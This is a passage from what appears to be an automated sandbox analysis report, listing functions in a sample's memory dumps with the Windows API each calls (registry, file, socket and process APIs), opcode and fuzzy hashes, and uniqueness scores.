CreateDirectoryW.KERNELBASE(?,?), ref: 004C079F

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 1506f5ce2827dad47453f198e643cd887315ed2ee6836ce9590ebacd462a7541
Instruction ID: 281d655c12a594d061405f60603a5aaf9ef59ebc1e99ad1e330b3eccfe41deae
Opcode Fuzzy Hash: 1506f5ce2827dad47453f198e643cd887315ed2ee6836ce9590ebacd462a7541
Instruction Fuzzy Hash: DE21B0B65093809FD751CB25CC85B92BFE8EF06310F0984EBE844DF263E224E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0015AB3A, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 0015ABB4

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 55d7ac0c1837492d49d7a32b93989fa5799a6efe5c8b75aa9113415728ddabff
Instruction ID: 423bcbc6ef1f9fd7cee7ad4e3ecf40987db42e540ce4f67f4f9f93ca44bbe9b6
Opcode Fuzzy Hash: 55d7ac0c1837492d49d7a32b93989fa5799a6efe5c8b75aa9113415728ddabff
Instruction Fuzzy Hash: 0E216A76640704EFEB20CE15DC84F66B7E8EF04711F48865AED458A251D770E908CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 004C1EEA, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 004C1F55

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: d6018ac85c352645dba1fb9f65775c306cfc7d843374812a92787051e1e76954
Instruction ID: f153df4edc77aac060d6f43614a2565d1529678dca4a4b083fd7abfef2092c49
Opcode Fuzzy Hash: d6018ac85c352645dba1fb9f65775c306cfc7d843374812a92787051e1e76954
Instruction Fuzzy Hash: 63219D75500640EFF721DF65CC85F66FBA8EF05310F04846EE9488B252D775A804CA66

Uniqueness

Uniqueness Score: -1.00%

Function 004C1055, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?), ref: 004C10C6

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 757bdb9dde3e498d3cb7ce3130d321827ed385a91d688de029ec51b60a311a02
Instruction ID: 7dafd62598e0172426713cbd44bce22819a6b42d68a4c679c98a8489802b862f
Opcode Fuzzy Hash: 757bdb9dde3e498d3cb7ce3130d321827ed385a91d688de029ec51b60a311a02
Instruction Fuzzy Hash: 3D219F755093849FD712CB65CC85B92BFF4EF06320F0984EBE985CB263D235A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 004C2A7A, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C2AEA

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: 3871cac16166984b4ed9b6ebca1af6c2216b2413afe5f0a2b3db1e1224f5fa1c
Instruction ID: e6162670d0da431aead3a1e571196486ed12760f805c2a8856dfdf53c945ea92
Opcode Fuzzy Hash: 3871cac16166984b4ed9b6ebca1af6c2216b2413afe5f0a2b3db1e1224f5fa1c
Instruction Fuzzy Hash: 6511AF76400704EFEB21CF51DD84FA7FBE8EF08310F04896AFA459A241D6B5A905CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 004C1FEA, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 004C205E

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: f51be786478766b56cbca08e09ea88f03886e34b510aff7d42a7323e9dba1df7
Instruction ID: 7665af505139a78ec24198a3c261c7700f4849a04cfe222a9e72061eea691df3
Opcode Fuzzy Hash: f51be786478766b56cbca08e09ea88f03886e34b510aff7d42a7323e9dba1df7
Instruction Fuzzy Hash: 1C21D171100704EFEB21DF55CC85F56FBE8EF08310F04846EEA448B241D2B5A905CB66

Uniqueness

Uniqueness Score: -1.00%

Function 004C178A, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 004C17F6

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: b0c42f674cc5004810ed8f2ef9742aa210d9a130ed8f4730d7d5debe3dedc808
Instruction ID: b05050c974b62487ff328dd0a98fe9dacc1869471c0cf1dda8bbb8788a9df391
Opcode Fuzzy Hash: b0c42f674cc5004810ed8f2ef9742aa210d9a130ed8f4730d7d5debe3dedc808
Instruction Fuzzy Hash: 5C21DE71504700EFEB21DF50DC85FA6FBE4EF09320F14846EE9858A252D776A805CB76

Uniqueness

Uniqueness Score: -1.00%

Function 004C04EA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C055C

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 671acd1e09202c92b188be54d42f3a525a95b9fcdf6139821126cb7bd2002161
Instruction ID: eda911107bcd525e2948ace0a635a7cfd4ba658cf7856d68ffa41038125873ae
Opcode Fuzzy Hash: 671acd1e09202c92b188be54d42f3a525a95b9fcdf6139821126cb7bd2002161
Instruction Fuzzy Hash: B411BE76500700EFEB20CF15DC80F67FBE8EF04720F04855AEA468B241D664E905CE76

Uniqueness

Uniqueness Score: -1.00%

Function 004C2456, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C24B5

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 1b9c360eb426a5749e8cd11e2fd573ee5ba77dbf03707dd1f22dbbf97066ceca
Instruction ID: 7c51402a08c0ec89ba4121794235345d43055c1fe413df09637bfcf19eac8bc0
Opcode Fuzzy Hash: 1b9c360eb426a5749e8cd11e2fd573ee5ba77dbf03707dd1f22dbbf97066ceca
Instruction Fuzzy Hash: 8811E276100700EFEB21CF55DD85FA7FBA8EF04320F14846EED098A241D6B5A905CB76

Uniqueness

Uniqueness Score: -1.00%

Function 004C0CCC, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 004C0D36

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: d5101eb7f13e603d9b8bb362949d3b34f22c1006aa07442c097cd68160e46245
Instruction ID: a72947dce14c26a01bca5164307695417042db544309957ef894f36819830929
Opcode Fuzzy Hash: d5101eb7f13e603d9b8bb362949d3b34f22c1006aa07442c097cd68160e46245
Instruction Fuzzy Hash: AB1190755043809FD761CF69CC85B93BFE8EF05210F0884AEED45CB252D234E804CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004C288A, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C28F1

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 0bcc4a014af69ad71476202b104fe752e2361b7ffd6b155dd57c4df2ece388b3
Instruction ID: e0b308d6ea3f9479ca2cbae4a4c151711e8b91fc9b660761d17464083d80a650
Opcode Fuzzy Hash: 0bcc4a014af69ad71476202b104fe752e2361b7ffd6b155dd57c4df2ece388b3
Instruction Fuzzy Hash: 6B11BEB9100304EFEB21CF51DD84FA6FBE8EF04710F04856AE9089A251D6B4A904CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 0015A51F, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0015A58A

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8340bede3eeda880718f07508656135e4fcf880ca1db6f84141c841d4371f2b6
Instruction ID: 0e4efa1e5e7ff397eb20292a1d967488278d8f7023e26b2c719d1f1e9e39791d
Opcode Fuzzy Hash: 8340bede3eeda880718f07508656135e4fcf880ca1db6f84141c841d4371f2b6
Instruction Fuzzy Hash: 5E117271409784AFDB228F51DC44E62FFF4EF4A310F08859AED858B552D375A418DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0015B7CA, Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 0015B841

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6a74391d2033cad47c65cdd6aa4cb92bf7ad3e6db843585e887717771b765005
Instruction ID: 2ad363b080392787c50e205df07afcf3f7d4c32781754143a85aac0803d4b820
Opcode Fuzzy Hash: 6a74391d2033cad47c65cdd6aa4cb92bf7ad3e6db843585e887717771b765005
Instruction Fuzzy Hash: 9D21C0714097C09FDB128B21DC54AA1BFB0EF17310F0D84CAEDC44F163D265A918DB62

Uniqueness

Uniqueness Score: -1.00%

Function 004C02DE, Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,00000E40), ref: 004C0353

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: d5bc77252da9161b9725c5ac42ebf284fd00384be7c3a058d019e67afed7aa38
Instruction ID: 227c1ff822932f1730237d02cb42503aab6b4817b38c482fdda722445f2905a9
Opcode Fuzzy Hash: d5bc77252da9161b9725c5ac42ebf284fd00384be7c3a058d019e67afed7aa38
Instruction Fuzzy Hash: D111C135100700EFFB319F11DC81F66FBA8EF04710F14855AFE455A291D275A959CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 004C0AD6, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNELBASE(?,00000E40), ref: 004C0B3F

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: cd27b653b9b4da424fcd49a61672952bd078bcb1e584ecfb6126de0540c308a2
Instruction ID: f51d0cd98e425522f6ea72c995e85f69d5df7b57dfc14ffd969354947365f1fb
Opcode Fuzzy Hash: cd27b653b9b4da424fcd49a61672952bd078bcb1e584ecfb6126de0540c308a2
Instruction Fuzzy Hash: 9311E335200300EFF720DE15DC85FA6B798DF04724F14805AFD048A281E6B9B944CA66

Uniqueness

Uniqueness Score: -1.00%

Function 004C09F2, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C0A51

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 16924a88ceea2e4af0ac84b6d0fe4af6ee98cf8bb1dde1a4b3761a373ec1bf35
Instruction ID: cc13f0de317e5a6a11e2d49252dfe3948841518e6bec0439c17c8a616dd950e3
Opcode Fuzzy Hash: 16924a88ceea2e4af0ac84b6d0fe4af6ee98cf8bb1dde1a4b3761a373ec1bf35
Instruction Fuzzy Hash: 2F11E076500700EFEB21CF51DC85FA6FBE8EF14720F14856AFA099A241C675A905CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 0015BB4F, Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 0015BBB9

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: eab1519549792e737f39f461095b72ece1e541329d65ebcff0e4e230797db888
Instruction ID: 9fec7cb474dffab3c1b09f6df58e2b1ead34c9baf71d4e0e49624c3e1cbad027
Opcode Fuzzy Hash: eab1519549792e737f39f461095b72ece1e541329d65ebcff0e4e230797db888
Instruction Fuzzy Hash: C311B1355097809FDB228F21CC85B52FFB4EF16220F0884DEED858B563D365A818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 004C2F3E, Relevance: 1.6, APIs: 1, Instructions: 58networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C2F97

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 829a1e78378e2b40a04caaada4aa8de9f4293a6a8a3062e069365b16d931f972
Instruction ID: bd087218f2c6f34a51915294d365d9bb08d90bfcaa2605749ccc247f6d58b83e
Opcode Fuzzy Hash: 829a1e78378e2b40a04caaada4aa8de9f4293a6a8a3062e069365b16d931f972
Instruction Fuzzy Hash: 4B11E075400304EFEB20CF50CD85FA6FBA8EF04720F14846AEE089A241C6B4A9048BB6

Uniqueness

Uniqueness Score: -1.00%

Function 0015BE05, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 0015BE70

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: fdd33869f53e16b73709764b7c3e286e5475cbf10c93a78f4b477b9baecdc300
Instruction ID: fb15d4c62efffd9c4dcef2fce57910a6381e80e976176073d4021d864c4431de
Opcode Fuzzy Hash: fdd33869f53e16b73709764b7c3e286e5475cbf10c93a78f4b477b9baecdc300
Instruction Fuzzy Hash: 0C118E7540D3C0AFDB128B259C85B61BFB4EF47624F0980DAED848F263D2656808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 004C0B83, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 004C0BE8

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 9007be9a6081b86faea5f4a25dcbcbb074b12b3ccf98e2adc95fbcc96ec6cfbd
Instruction ID: daec86583b4bf7a060304a69fc1cc8485064ca6da335e0e7fa9f8155104f26bd
Opcode Fuzzy Hash: 9007be9a6081b86faea5f4a25dcbcbb074b12b3ccf98e2adc95fbcc96ec6cfbd
Instruction Fuzzy Hash: 211193754093C49FD712CB25DC45B92BFB4EF02214F0984DBDD848F153D2759849CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0015BEB4, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 0015BF0C

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: b0494852b0b7e6fa0decf2cdee7bf0fedad7050a68587546419765c05195571f
Instruction ID: 50db3aa94c24003630e54426f00e25419680c34dba7167c5d9d1ccef9ec46699
Opcode Fuzzy Hash: b0494852b0b7e6fa0decf2cdee7bf0fedad7050a68587546419765c05195571f
Instruction Fuzzy Hash: 311194715083809FD711CF25DC85B92BFE8EF46260F0884AAED55CF256D375E808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004C0CEE, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 004C0D36

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 7b67ba757ba229fe4e3d172b2db8d6879f08b4217a550c99d318917f04561502
Instruction ID: 6b00a7ad37ffab8ebadc1137b92f2acefa07fbe9074d77e1731661c9f1a04214
Opcode Fuzzy Hash: 7b67ba757ba229fe4e3d172b2db8d6879f08b4217a550c99d318917f04561502
Instruction Fuzzy Hash: 87118279600700DBEB50CF69DC85B66FBE8EF14720F08846EDD0ACB355D674E804CA66

Uniqueness

Uniqueness Score: -1.00%

Function 0015BAB0, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 0015BB0B

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 0d6aab7ca78641ff0064b72df5e6028756d6bad8483270c52221945017b24541
Instruction ID: 0142a6f9c9f99dd6e8d03eed71f0e0e846e6e37aa0ac36e37856b091e9a5363d
Opcode Fuzzy Hash: 0d6aab7ca78641ff0064b72df5e6028756d6bad8483270c52221945017b24541
Instruction Fuzzy Hash: 7711A3715087849FD7118F15DC85A92FFF4EF06320F0880DEED858B262D275A818DB62

Uniqueness

Uniqueness Score: -1.00%

Function 004C075A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 004C079F

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 48e31d5860e1556733791a7b044efd535a09aa76992520574222c3e8eb19bd0d
Instruction ID: ff52270d6924e6d846b7e651accfb039e6e4cb0b86c4b570f592fc90395568de
Opcode Fuzzy Hash: 48e31d5860e1556733791a7b044efd535a09aa76992520574222c3e8eb19bd0d
Instruction Fuzzy Hash: 7C115E79601340DFEB64CF19D885B66FBD8EB04760F0884ABDD09DB645D678E804CF66

Uniqueness

Uniqueness Score: -1.00%

Function 004C0932, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E40,679C6D7E,00000000,00000000,00000000,00000000), ref: 004C0985

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: f3ef90f3a40332e93ce1fbc465edd471038e742c4d239f45d1b22810373356ba
Instruction ID: fdd338e2fa969d13510468dd5363c5d6876d58c3b118bee0f5bdff6bb5602030
Opcode Fuzzy Hash: f3ef90f3a40332e93ce1fbc465edd471038e742c4d239f45d1b22810373356ba
Instruction Fuzzy Hash: C601D275500704EFFB20CF15DC85FA6FBA8EF44720F14809BEE499B242D678A904CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 0015A75B, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 0015A7BC

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 99a89e0d245b720321362b8b31dd6060a4f08041cd3846a8c77386820c706228
Instruction ID: 6c05ba03ad8dc65439d6f297855d42677662a777ec87e7e8c63f99ed97bdd343
Opcode Fuzzy Hash: 99a89e0d245b720321362b8b31dd6060a4f08041cd3846a8c77386820c706228
Instruction Fuzzy Hash: 5411CE714483849FDB11CF11DC85B92BFB4EF06220F0884AAED488F243D376A808CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 003FCC88, Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

H>|, xrefs: 003FCF65

Memory Dump Source

Source File: 00000005.00000002.2597293008.00000000003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false

Similarity

API ID:
String ID: H>|
API String ID: 0-2579374848
Opcode ID: 713b6053063496f522524c08906cdaf7e831f36244d51edfc36f2d660f9bcabe
Instruction ID: f983a62324484f6a3d0dc713d0b58ef63e5f34a6f5e013b0291759a33b892789
Opcode Fuzzy Hash: 713b6053063496f522524c08906cdaf7e831f36244d51edfc36f2d660f9bcabe
Instruction Fuzzy Hash: 5AA15832A6425DDFC716CB68CA405BEFBB9EF81301F25947AE6159BA41C331DD02CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0015A488, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0015A4E5

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 53f86ec03a1011b1468ec98ea4028a061eab5802fc1f0c8dd69799794986e3f3
Instruction ID: 70772b284cfe17b6a43467c7e5e1592cc5b880bddac1738a6adb2b8d179b30e7
Opcode Fuzzy Hash: 53f86ec03a1011b1468ec98ea4028a061eab5802fc1f0c8dd69799794986e3f3
Instruction Fuzzy Hash: D111AC314493809FD712CF15CC85A92BFB4EF47260F0980DADD848F263D3B9A808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 004C1086, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?), ref: 004C10C6

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: 5d31d36925940b153517e0260ba4fb65652375ef43f520ff49ceef8db022d107
Instruction ID: 2794dd0c8eb6c007b46343c59c6394553b948c7c296e77fc04c93cde9e4020cb
Opcode Fuzzy Hash: 5d31d36925940b153517e0260ba4fb65652375ef43f520ff49ceef8db022d107
Instruction Fuzzy Hash: EE11A175500744CFEB50CF66DC84B56FBE4EF05320F0884AEDD098B656D639E954CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0015A350, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0015A3A4

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: c7a1ee3d78b38232111b9e649457fd78d113fb6cd22a26b1797e33c066a448cb
Instruction ID: a99f07d4d42595049e502401bbedae7f3276a344980258e0f689526108e94887
Opcode Fuzzy Hash: c7a1ee3d78b38232111b9e649457fd78d113fb6cd22a26b1797e33c066a448cb
Instruction Fuzzy Hash: 4211A171509384AFDB228B15DC84B62FFB4EF46225F0880DAED844F253D275A808CB72

Uniqueness

Uniqueness Score: -1.00%

Function 004C2C92, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E40,?,?), ref: 004C2CE2

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 548e4d28af1ad0d62a58b5e9af4794d9122daf6d8f5a7a70e2ce08ae5e33a418
Instruction ID: 4aa8ebe4c2e8496e259416a57f6209b94fd7e346d2beb71631ff9b3108b8ac92
Opcode Fuzzy Hash: 548e4d28af1ad0d62a58b5e9af4794d9122daf6d8f5a7a70e2ce08ae5e33a418
Instruction Fuzzy Hash: FD017171900600ABE310DF16DC86B66FBA8FB88A20F14816AED089B745D235F515CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 0015A172, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E40,?,?), ref: 0015A1C2

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 29978ceb62a7fd0cb1f890bbae6effb6cff2803d79bc8689f7eb4d2e1b21a7c6
Instruction ID: 493c24f29369b12aed30b8c1c7645557d699d04770b82a5ec282d21ef9c756b1
Opcode Fuzzy Hash: 29978ceb62a7fd0cb1f890bbae6effb6cff2803d79bc8689f7eb4d2e1b21a7c6
Instruction Fuzzy Hash: 84017171900600ABE710DF16DC86B66FBA8FB88A20F14816AED089B745D235F515CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 0015B48C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(?,?), ref: 0015B4E3

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: PlacementWindow
String ID:
API String ID: 2154376794-0
Opcode ID: 611c37abb4e134d72760c84378a4a696f21303910262537e6de6d3c60c25b697
Instruction ID: e95d88d78275615f41f3a2f4312409eb0f0ac42fcda2f2ce91be97368c1ae2d0
Opcode Fuzzy Hash: 611c37abb4e134d72760c84378a4a696f21303910262537e6de6d3c60c25b697
Instruction Fuzzy Hash: 1911ED724087849FD721CF11DC89B52FFB4EF16320F09809AED894B263D375A808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0015BED2, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?), ref: 0015BF0C

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 3ceb2d873c6210dd9aa1cd0691355317de54a1a83f14004fb664b6f61b920e7a
Instruction ID: aa66575e9deb52c25c0afbe91ca9ca3b7fd2b8202c6c7a16d6cf55ad31aa4f93
Opcode Fuzzy Hash: 3ceb2d873c6210dd9aa1cd0691355317de54a1a83f14004fb664b6f61b920e7a
Instruction Fuzzy Hash: 53019E71604300DBEB20CF2ADCC57A6FB94EF00221F0880AADD19CF646D774E808CA62

Uniqueness

Uniqueness Score: -1.00%

Function 0015A546, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0015A58A

Memory Dump Source

Source File: 00000005.00000002.2597166544.000000000015A000.00000040.00000001.sdmp, Offset: 0015A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 125387809e1cc6da608d3ef4795c7cf1ae78c17da39fd28b7e55999da30292fa
Instruction ID: c70d4ef91bcaaabc6aaa18df722b3b2ea4ce1aa7be0187093eda77e60c44fd44
Opcode Fuzzy Hash: 125387809e1cc6da608d3ef4795c7cf1ae78c17da39fd28b7e55999da30292fa
Instruction Fuzzy Hash: 26015B32410704DFDB218F95D884B56FBE0EF08721F0885AADE494A615D376A418DB62

Uniqueness

Uniqueness Score: -1.00%

Function 004C16EE, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,?,?), ref: 004C173E

Memory Dump Source

Source File: 00000005.00000002.2597386906.00000000004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
